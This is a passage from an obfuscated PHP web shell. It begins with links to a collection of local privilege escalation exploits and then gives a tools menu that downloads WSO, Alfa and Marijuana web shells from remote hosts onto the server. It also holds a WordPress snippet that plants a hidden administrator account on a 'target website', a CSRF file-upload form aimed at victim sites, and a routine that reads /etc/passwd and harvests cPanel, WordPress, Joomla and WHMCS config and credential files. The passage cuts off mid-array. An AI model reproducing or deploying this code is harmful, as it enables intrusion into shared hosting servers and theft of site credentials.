<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2009/CVE-2009-1185' class='text-decoration-none text-light'>CVE-2009-1185 | Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV < 1.4.1 - Local Privilege Escalation (1)</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2009/CVE-2009-1337' class='text-decoration-none text-light'>CVE-2009-1337 | Linux Kernel < 2.6.29 - 'exit_notify()' Local Privilege Escalation
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2009/CVE-2009-2692' class='text-decoration-none text-light'>CVE-2009-2692 | Linux Kernel 2.x (RedHat) - 'sock_sendpage()' Ring0 Privilege Escalation (1)</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2009/CVE-2009-2698' class='text-decoration-none text-light'>CVE-2009-2698 | Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2009/CVE-2009-3547' class='text-decoration-none text-light'>CVE-2009-3547 | Linux 2.6.x fs/pipe.c Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2010/CVE-2010-1146' class='text-decoration-none text-light'>CVE-2010-1146 | ReiserFS (Linux Kernel 2.6.34-rc3 / RedHat / Ubuntu 9.10) - 'xattr' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2010/CVE-2010-2959' class='text-decoration-none text-light'>CVE-2010-2959 | Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) - 'CAN BCM' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2010/CVE-2010-3081' class='text-decoration-none text-light'>CVE-2010-3081 | Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2010/CVE-2010-3301' class='text-decoration-none text-light'>CVE-2010-3301 | Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2010/CVE-2010-3437' class='text-decoration-none text-light'>CVE-2010-3437 | Linux Kernel < 2.6.36-rc6 (RedHat / Ubuntu 10.04) - 'pktcdvd' Kernel Memory Disclosure</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2010/CVE-2010-3904' class='text-decoration-none text-light'>CVE-2010-3904 | Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2010/CVE-2010-4073' class='text-decoration-none text-light'>CVE-2010-4073 | Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2010/CVE-2010-4258' class='text-decoration-none text-light'>CVE-2010-4258 | Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2010/CVE-2010-4347' class='text-decoration-none text-light'>CVE-2010-4347 | Linux Kernel < 2.6.37-rc2 ACPI custom_method Privilege Escalation
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2011/CVE-2011-1021' class='text-decoration-none text-light'>CVE-2011-1021 | Linux Kernel < 2.6.37-rc2 - 'ACPI custom_method' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2011/CVE-2011-2777' class='text-decoration-none text-light'>CVE-2011-2777 | Acpid 1:</b><br>2.0.10-1ubuntu2 (Ubuntu 11.04/11.10) - Boundary Crossing Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2011/CVE-2011-1485' class='text-decoration-none text-light'>CVE-2011-1485 | pkexec - Race Condition Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2011/EDB-ID-18071' class='text-decoration-none text-light'>EDB-ID-18071 | Calibre E-Book Reader - Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2011/EDB-ID-17391' class='text-decoration-none text-light'>EDB-ID-17391 | Linux Kernel 2.6.28/3.0 (DEC Alpha Linux) - Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2011/EDB-ID-15944' class='text-decoration-none text-light'>EDB-ID-15944 | Linux Kernel < 2.6.34 (Ubuntu 10.10 x86/x64) - 'CAP_SYS_ADMIN' Local Privilege Escalation (2)</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2012/CVE-2012-0056' class='text-decoration-none text-light'>CVE-2012-0056 | Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2012/CVE-2012-3524' class='text-decoration-none text-light'>CVE-2012-3524 | libdbus - 'DBUS_SYSTEM_BUS_ADDRESS' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2012/CVE-2012-0809' class='text-decoration-none text-light'>CVE-2012-0809 | sudo 1.8.0 < 1.8.3p1 - Format String</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2013/CVE-2013-0268' class='text-decoration-none text-light'>CVE-2013-0268 | Linux Kernel 3.7.6 (RedHat x86/x64) - 'MSR' Driver Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2013/CVE-2013-1763' class='text-decoration-none text-light'>CVE-2013-1763 | Linux Kernel 3.3 < 3.8 (Ubuntu / Fedora 18) - 'sock_diag_handlers()' Local Privilege Escalation (3)</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2013/CVE-2013-1858' class='text-decoration-none text-light'>CVE-2013-1858 | Linux Kernel 'CLONE_NEWUSER|CLONE_FS' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2013/CVE-2013-2094' class='text-decoration-none text-light'>CVE-2013-2094 | Linux Kernel < 3.8.9 (x86-64) - 'perf_swevent_init' Local Privilege Escalation (2)</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2014/CVE-2014-0038' class='text-decoration-none text-light'>CVE-2014-0038 | Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write (2)</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2014/CVE-2014-0196' class='text-decoration-none text-light'>CVE-2014-0196 | Linux Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Echo Race Condition Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2014/CVE-2014-3153' class='text-decoration-none text-light'>CVE-2014-3153 | Linux Kernel 3.14.5 (CentOS 7 / RHEL) - 'libfutex' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2014/CVE-2014-4014' class='text-decoration-none text-light'>CVE-2014-4014 | Linux Kernel 3.13 - SGID Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2014/CVE-2014-4699' class='text-decoration-none text-light'>CVE-2014-4699 | Linux Kernel < 3.2.0-23 (Ubuntu 12.04 x64) - 'ptrace/sysret' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2014/CVE-2014-5284' class='text-decoration-none text-light'>CVE-2014-5284 | OSSEC 2.8 - 'hosts.deny' Local Privilege Escalation
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2015/CVE-2015-1328' class='text-decoration-none text-light'>CVE-2015-1328 | Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2015/CVE-2015-7547' class='text-decoration-none text-light'>CVE-2015-7547 | glibc - 'getaddrinfo' Stack Buffer Overflow (PoC)
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2016/CVE-2016-0728' class='text-decoration-none text-light'>CVE-2016-0728 | Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Escalation (1)</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2016/CVE-2016-2384' class='text-decoration-none text-light'>CVE-2016-2384 | Linux Kernel 3.x (Ubuntu 14.04 / Mint 17.3 / Fedora 22) - Double-free usb-midi SMEP Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2016/CVE-2016-5195' class='text-decoration-none text-light'>CVE-2016-5195 | Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2016/CVE-2016-8655' class='text-decoration-none text-light'>CVE-2016-8655 | Linux 4.4.0 < 4.4.0-53 - 'AF_PACKET chocobo_root' Local Privilege Escalation (Metasploit)</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2016/CVE-2016-9793' class='text-decoration-none text-light'>CVE-2016-9793 | Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' / 'SO_RCVBUFFORCE' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2017/CVE-2017-5123' class='text-decoration-none text-light'>CVE-2017-5123 | Linux Kernel 4.14.0-rc4+ - 'waitid()' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2017/CVE-2017-6074' class='text-decoration-none text-light'>CVE-2017-6074 | Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2017/CVE-2017-7308' class='text-decoration-none text-light'>CVE-2017-7308 | Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2017/CVE-2017-7494' class='text-decoration-none text-light'>CVE-2017-7494 | Samba 3.5.0 - Remote Code Execution</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2017/CVE-2017-7533' class='text-decoration-none text-light'>CVE-2017-7533 | Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2017/CVE-2017-16939' class='text-decoration-none text-light'>CVE-2017-16939 | Linux Kernel (Ubuntu 17.04) - 'XFRM' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2017/CVE-2017-16995' class='text-decoration-none text-light'>CVE-2017-16995 | Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2017/CVE-2017-1000112' class='text-decoration-none text-light'>CVE-2017-1000112 | Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2017/CVE-2017-1000367' class='text-decoration-none text-light'>CVE-2017-1000367 | Sudo 1.8.20 - 'get_process_ttyname()' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2018/CVE-2018-1000001' class='text-decoration-none text-light'>CVE-2018-1000001 | glibc < 2.26 - 'getcwd()' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2019/CVE-2019-7304' class='text-decoration-none text-light'>CVE-2019-7304 | snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (1)</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2019/CVE-2019-13272' class='text-decoration-none text-light'>CVE-2019-13272 | Linux Kernel 4.10 < 5.1.17 - 'PTRACE_TRACEME' pkexec Local Privilege Escalation</a><br>
<b>IBM AIX</b><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/IBM%20AIX' class='text-decoration-none text-light'>CVE-2013-4011 - IBM AIX 6.1 / 7.1 Localroot Privilege Escalation</a><br>
<b>FreeBSD</b><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/FreeBSD/2005/EDB-ID-1311' class='text-decoration-none text-light'>EDB-ID-1311 | FreeBSD 4.x / < 5.4 - 'master.passwd' Disclosure</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/FreeBSD/2008/CVE-2008-3531' class='text-decoration-none text-light'>CVE-2008-3531 | FreeBSD 7.0/7.1 - 'vfs.usermount' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/FreeBSD/2008/CVE-2008-5736' class='text-decoration-none text-light'>CVE-2008-5736 | FreeBSD 6.4 - Netgraph Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/FreeBSD/2009/CVE-2009-3527' class='text-decoration-none text-light'>CVE-2009-3527 | FreeBSD 6.4 - 'pipeclose()'/'knlist_cleardel()' Race Condition</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/FreeBSD/2009/CVE-2009-4146' class='text-decoration-none text-light'>CVE-2009-4146 | FreeBSD 8.0 Run-Time Link-Editor (RTLD) - Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/FreeBSD/2009/EDB-ID-9860' class='text-decoration-none text-light'>EDB-ID-9860 | FreeBSD 7.2 - VFS/devfs Race Condition</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/FreeBSD/2010/CVE-2010-2020' class='text-decoration-none text-light'>CVE-2010-2020 | FreeBSD 8.0/7.3/7.2 - 'nfs_mount()' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/FreeBSD/2010/CVE-2010-2693' class='text-decoration-none text-light'>CVE-2010-2693 | FreeBSD - 'mbufs()' sendfile Cache Poisoning Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/FreeBSD/2010/CVE-2010-4210' class='text-decoration-none text-light'>CVE-2010-4210 | FreeBSD - 'pseudofs' Null Pointer Dereference Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/FreeBSD/2011/CVE-2011-4062' class='text-decoration-none text-light'>CVE-2011-4062 | FreeBSD - UIPC socket heap Overflow (PoC)</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/FreeBSD/2011/CVE-2011-4122' class='text-decoration-none text-light'>CVE-2011-4122 | OpenPAM - 'pam_start()' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/FreeBSD/2011/CVE-2011-4862' class='text-decoration-none text-light'>CVE-2011-4862 | TelnetD encrypt_keyid - Function Pointer Overwrite</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/FreeBSD/2012/CVE-2012-0217' class='text-decoration-none text-light'>CVE-2012-0217 | FreeBSD 8.3 - 9.0 amd64 Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/FreeBSD/2012/EDB-ID-28718' class='text-decoration-none text-light'>EDB-ID-28718 | FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/FreeBSD/2013/CVE-2013-2171' class='text-decoration-none text-light'>CVE-2013-2171 | FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation</a><br>
";}if($azu3293050475['id']=='getools'){ob_implicit_flush();ob_end_flush();s();echo '<center class="anu">Get Tools</center>';echo "
<div class='text-center'>
<div class='btn-group mb-3'>
<a class='btn btn-outline-light btn-sm' href='".$_SERVER['REQUEST_URI']."&id_two=wso'><i class='bi bi-peace'></i> Wso Shell </a>
<a class='btn btn-outline-light btn-sm' href='".$_SERVER['REQUEST_URI']."&id_two=alfa'><i class='bi bi-peace'></i> Alfa Tesla Shell </a>
<a class='btn btn-outline-light btn-sm' href='".$_SERVER['REQUEST_URI']."&id_two=marijuana'><i class='bi bi-peace'></i> Marijuana Shell </a>
<a class='btn btn-outline-light btn-sm' href='".$_SERVER['REQUEST_URI']."&id_two=wpadd'><i class='bi bi-peace'></i> WP Add Admin </a>
<a class='btn btn-outline-light btn-sm' href='".$_SERVER['REQUEST_URI']."&id_two=shellscan'><i class='bi-peace'></i> Shell Scanner </a>
<a class='btn btn-outline-light btn-sm' href='".$_SERVER['REQUEST_URI']."&id_two=csrf'><i class='bi bi-peace'></i> CSRF </a>
</div>
</div>";echo "<b><center class=anu>";if(isset($_GET['id_two'])&&$_GET['id_two']=="wso"){echo "<center class='anu'>Get Wso Shell<br>";function wso($wdu4101391790,$dez2285623924){$tfi578531298=fopen($dez2285623924,"w");$vcz1281410033=curl_init();curl_setopt($vcz1281410033,CURLOPT_URL,$wdu4101391790);curl_setopt($vcz1281410033,CURLOPT_BINARYTRANSFER,true);curl_setopt($vcz1281410033,CURLOPT_RETURNTRANSFER,true);curl_setopt($vcz1281410033,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($vcz1281410033,CURLOPT_FILE,$tfi578531298);return curl_exec($vcz1281410033);curl_close($vcz1281410033);fclose($tfi578531298);ob_flush();flush();}if(file_exists('babiwso.php')){echo"<gr><a style='color:white;text-decoration:none;' href=$jxg3766473888/babiscan.php target='_blank'>Click Here</a></gr></center>";}else{if(wso("https://raw.githubusercontent.com/BOTKNTL/kontol/master/wso425.php","babiwso.php")){echo"<gr><a style='color:white;text-decoration:none;' href=$jxg3766473888/babiwso.php target='_blank'>Click Here</a></gr></center>";}else{echo "<rd>Failed to create wso shell</rd>";}}echo "</center>";}elseif(isset($_GET['id_two'])&&$_GET['id_two']=="alfa"){echo "<center class='anu'>Get Alfa Shell<br>";function alfa($wdu4101391790,$dez2285623924){$tfi578531298=fopen($dez2285623924,"w");$vcz1281410033=curl_init();curl_setopt($vcz1281410033,CURLOPT_URL,$wdu4101391790);curl_setopt($vcz1281410033,CURLOPT_BINARYTRANSFER,true);curl_setopt($vcz1281410033,CURLOPT_RETURNTRANSFER,true);curl_setopt($vcz1281410033,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($vcz1281410033,CURLOPT_FILE,$tfi578531298);return curl_exec($vcz1281410033);curl_close($vcz1281410033);fclose($tfi578531298);ob_flush();flush();}if(file_exists('babialfa.php')){echo"<gr><a style='color:white;text-decoration:none;' href=$jxg3766473888/babialfa.php target='_blank'>Click Here</a></gr></center>";}else{if(alfa("https://raw.githubusercontent.com/BOTKNTL/kontol/master/alfatesla.php","babialfa.php")){echo"<gr><a style='color:white;text-decoration:none;' href=$jxg3766473888/babialfa.php target='_blank'>Click Here</a></gr></center>";}else{echo "<rd>Failed to create alfa shell</rd>";}}}elseif(isset($_GET['id_two'])&&$_GET['id_two']=="marijuana"){echo "<center class='anu'>Get Marijuana Shell<br>";function marijuana($wdu4101391790,$dez2285623924){$tfi578531298=fopen($dez2285623924,"w");$vcz1281410033=curl_init();curl_setopt($vcz1281410033,CURLOPT_URL,$wdu4101391790);curl_setopt($vcz1281410033,CURLOPT_BINARYTRANSFER,true);curl_setopt($vcz1281410033,CURLOPT_RETURNTRANSFER,true);curl_setopt($vcz1281410033,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($vcz1281410033,CURLOPT_FILE,$tfi578531298);return curl_exec($vcz1281410033);curl_close($vcz1281410033);fclose($tfi578531298);ob_flush();flush();}if(file_exists('babimarijuana.php')){echo"<gr><a style='color:white;text-decoration:none;' href=$jxg3766473888/babimarijuana.php target='_blank'>Click Here</a></gr></center>";}else{if(marijuana("https://raw.githubusercontent.com/BOTKNTL/kontol/master/maricoli.php","babimarijuana.php")){echo"<gr><a style='color:white;text-decoration:none;' href=$jxg3766473888/babimarijuana.php target='_blank'>Click Here</a></gr></center>";}else{echo "<rd>Failed to create marijuana shell:(</rd>";}}echo "</center>";}elseif(isset($_GET['id_two'])&&$_GET['id_two']=="wpadd"){?>
<div class='container-fluid language-javascript'>
<div class='shell mb-3'>
<pre style='font-size:10px;'><code>function shizuoadmin(){
$login = 'shizuo';
$passw = 'shizuo#1337';
$email = '[email protected]';
if ( !username_exists( $login ) && !email_exists( $email ) ) {
$user_id = wp_create_user( $login, $passw, $email );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
add_action('init','shizuoadmin');</code></pre>
</div>
Add the above code in the functions.php file on the target website.<br>
example: https://site.gov/wp-content/themes/[theme name/functions.php
</div><?php }elseif(isset($_GET['id_two'])&&$_GET['id_two']=="csrf"){echo "<div class='card card-body text-dark input-group mb-3'>
<form method='POST'> Target:<input class='form-control btn-sm' type='text' name='url' size='50' height='10' placeholder='http://victim.com/[PATH]/upload.php' style='margin: 5px auto; padding-left: 5px;' required>
POST File: <input class='form-control btn-sm' type='text' name='pf' size='50' height='10' placeholder='Filedata, dzupload, dzfile, dzfiles, file, ajaxfup, files[], qqfile, userfile' style='margin: 5px auto; padding-left: 5px;' required>
<input class='btn btn-dark btn-sm' type='submit' name='d' value='Lock!'></form>";$wdu4101391790=$_POST["url"];$ljf3392647012=$_POST["pf"];$gxs2564639436=$_POST["d"];if($gxs2564639436){echo"<br><form method='post' target='_blank' action='$wdu4101391790' enctype='multipart/form-data'><input class='form-control btn-sm' type='file' name='$ljf3392647012'>
<input class='btn btn-dark btn-sm' type='submit' name='g' value='Upload!'></form></form></div>";}}elseif(isset($_GET['id_two'])&&$_GET['id_two']=="shellscan"){echo "<center class='anu'>Get Shell Backdoor Detector<br>";function babidetect($wdu4101391790,$dez2285623924){$tfi578531298=fopen($dez2285623924,"w");$vcz1281410033=curl_init();curl_setopt($vcz1281410033,CURLOPT_URL,$wdu4101391790);curl_setopt($vcz1281410033,CURLOPT_BINARYTRANSFER,true);curl_setopt($vcz1281410033,CURLOPT_RETURNTRANSFER,true);curl_setopt($vcz1281410033,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($vcz1281410033,CURLOPT_FILE,$tfi578531298);return curl_exec($vcz1281410033);curl_close($vcz1281410033);fclose($tfi578531298);ob_flush();flush();}if(file_exists('babidetect.php')){echo"<gr><a style='color:white;text-decoration:none;' href=$jxg3766473888/babidetect.php target='_blank'>Click Here</a></gr></center>";}else{if(babidetect("https://gitlab.com/jasonrondiguez/a/-/raw/main/t0000000ls/shellllllllscaaannnnn.php","babidetect.php")){echo"<gr><a style='color:white;text-decoration:none;' href=$jxg3766473888/babidetect.php target='_blank'>Click Here</a></gr></center>";}else{echo "<rd>Failed to create shell backdoor detector:(</rd>";}}echo "</center>";}}if($azu3293050475['id']=='config'){echo '<center class="anu"><br>Grab Config by shizuo</center>';$lyl783637705=fopen("/etc/passwd","r")or die("<rd>can't read /etc/passwd:(</rd>");$lov3876093456=mkdir("shizuo_CONFIG",0777);$zcg3499406695="Options allnRequire NonenSatisfy Any";$xww644730778=fopen("shizuo_CONFIG/.htaccess","w");fwrite($xww644730778,$zcg3499406695);while($sqq456024468=fgets($lyl783637705)){if($sqq456024468==""||!$lyl783637705){echo "<rd>Can't read /etc/passwd:(</rd>";}else{preg_match_all('/(.*?):x:/',$sqq456024468,$vbe2983736385);foreach($vbe2983736385[1]as $yag87770677){$aiu42851827="/home/$yag87770677/public_html/";if(is_readable($aiu42851827)){$csg2312585810=array("/home/$yag87770677/.my.cnf"=>"cpanel","/home/$yag87770677/.accesshash"=>"WHM-accesshash","/home/$yag87770677/config/koneksi.php"=>"Lokomedia","/home/$yag87770677/forum/config.php"=>"phpBB","/home/$yag87770677/sites/default/settings.php"=>"Drupal","/home/$yag87770677/config/settings.inc.php"=>"PrestaShop","/home/$yag87770677/app/etc/local.xml"=>"Magento","/home/$yag87770677/admin/config.php"=>"OpenCart","/home/$yag87770677/application/config/database.php"=>"Ellislab","/home/$yag87770677/vb/includes/config.php"=>"Vbulletin","/home/$yag87770677/includes/config.php"=>"Vbulletin","/home/$yag87770677/forum/includes/config.php"=>"Vbulletin","/home/$yag87770677/forums/includes/config.php"=>"Vbulletin","/home/$yag87770677/cc/includes/config.php"=>"Vbulletin","/home/$yag87770677/inc/config.php"=>"MyBB","/home/$yag87770677/includes/configure.php"=>"OsCommerce","/home/$yag87770677/shop/includes/configure.php"=>"OsCommerce","/home/$yag87770677/os/includes/configure.php"=>"OsCommerce","/home/$yag87770677/oscom/includes/configure.php"=>"OsCommerce","/home/$yag87770677/products/includes/configure.php"=>"OsCommerce","/home/$yag87770677/cart/includes/configure.php"=>"OsCommerce","/home/$yag87770677/inc/conf_global.php"=>"IPB","/home/$yag87770677/wp-config.php"=>"Wordpress","/home/$yag87770677/wp/test/wp-config.php"=>"Wordpress","/home/$yag87770677/blog/wp-config.php"=>"Wordpress","/home/$yag87770677/beta/wp-config.php"=>"Wordpress","/home/$yag87770677/portal/wp-config.php"=>"Wordpress","/home/$yag87770677/site/wp-config.php"=>"Wordpress","/home/$yag87770677/wp/wp-config.php"=>"Wordpress","/home/$yag87770677/WP/wp-config.php"=>"Wordpress","/home/$yag87770677/news/wp-config.php"=>"Wordpress","/home/$yag87770677/wordpress/wp-config.php"=>"Wordpress","/home/$yag87770677/test/wp-config.php"=>"Wordpress","/home/$yag87770677/demo/wp-config.php"=>"Wordpress","/home/$yag87770677/home/wp-config.php"=>"Wordpress","/home/$yag87770677/v1/wp-config.php"=>"Wordpress","/home/$yag87770677/v2/wp-config.php"=>"Wordpress","/home/$yag87770677/press/wp-config.php"=>"Wordpress","/home/$yag87770677/new/wp-config.php"=>"Wordpress","/home/$yag87770677/blogs/wp-config.php"=>"Wordpress","/home/$yag87770677/configuration.php"=>"Joomla","/home/$yag87770677/blog/configuration.php"=>"Joomla","/home/$yag87770677/submitticket.php"=>"^WHMCS","/home/$yag87770677/cms/configuration.php"=>"Joomla","/home/$yag87770677/beta/configuration.php"=>"Joomla","/home/$yag87770677/portal/configuration.php"=>"Joomla","/home/$yag87770677/site/configuration.php"=>"Joomla","/home/$yag87770677/main/configuration.php"=>"Joomla","/home/$yag87770677/home/configuration.php"=>"Joomla","/home/$yag87770677/demo/configuration.php"=>"Joomla","/home/$yag87770677/test/configuration.php"=>"Joomla","/home/$yag87770677/v1/configuration.php"=>"Joomla","/home/$yag87770677/v2/configuration.php"=>"Joomla","/home/$yag87770677/joomla/configuration.php"=>"Joomla","/home/$yag87770677/new/configuration.php"=>"Joomla","/home/$yag87770677/WHMCS/submitticket.php"=>"WHMCS","/home/$yag87770677/whmcs1/submitticket.php"=>"WHMCS","/home/$yag87770677/Whmcs/submitticket.php"=>"WHMCS","/home/$yag87770677/whmcs/submitticket.php"=>"WHMCS","/home/$yag87770677/whmcs/submitticket.php"=>"WHMCS","/home/$yag87770677/WHMC/submitticket.php"=>"WHMCS","/home/$yag87770677/Whmc/submitticket.php"=>"WHMCS","/home/$yag87770677/whmc/submitticket.php"=>"WHMCS","/home/$yag87770677/WHM/submitticket.php"=>"WHMCS","/home/$yag87770677/Whm/submitticket.php"=>"WHMCS","/home/$yag87770677/whm/submitticket.php"=>"WHMCS","/home/$yag87770677/HOST/submitticket.php"=>"WHMCS","/home/$yag87770677/Host/submitticket.php"=>"WHMCS","/home/$yag87770677/host/submitticket.php"=>"WHMCS","/home/$yag87770677/SUPPORTES/submitticket.php"=>"WHMCS","/home/$yag87770677/Supportes/submitticket.php"=>"WHMCS","/home/$yag87770677/supportes/submitticket.php"=>"WHMCS","/home/$yag87770677/domains/submitticket.php"=>"WHMCS","/home/$yag87770677/domain/submitticket.php"=>"WHMCS","/home/$yag87770677/Hosting/submitticket.php"=>"WHMCS","/home/$yag87770677/HOSTING/submitticket.php"=>"WHMCS","/home/$yag87770677/hosting/submitticket.php"=>"WHMCS","/home/$yag87770677/CART/submitticket.php"=>"WHMCS","/home/$yag87770677/Cart/submitticket.php"=>"WHMCS","/home/$yag87770677/cart/submitticket.php"=>"WHMCS","/home/$yag87770677/ORDER/submitticket.php"=>"WHMCS","/home/$yag87770677/Order/submitticket.php"=>"WHMCS","/home/$yag87770677/order/submitticket.php"=>"WHMCS","/home/$yag87770677/CLIENT/submitticket.php"=>"WHMCS","/home/$yag87770677/Client/submitticket.php"=>"WHMCS","/home/$yag87770677/client/submitticket.php"=>"WHMCS","/home/$yag8777067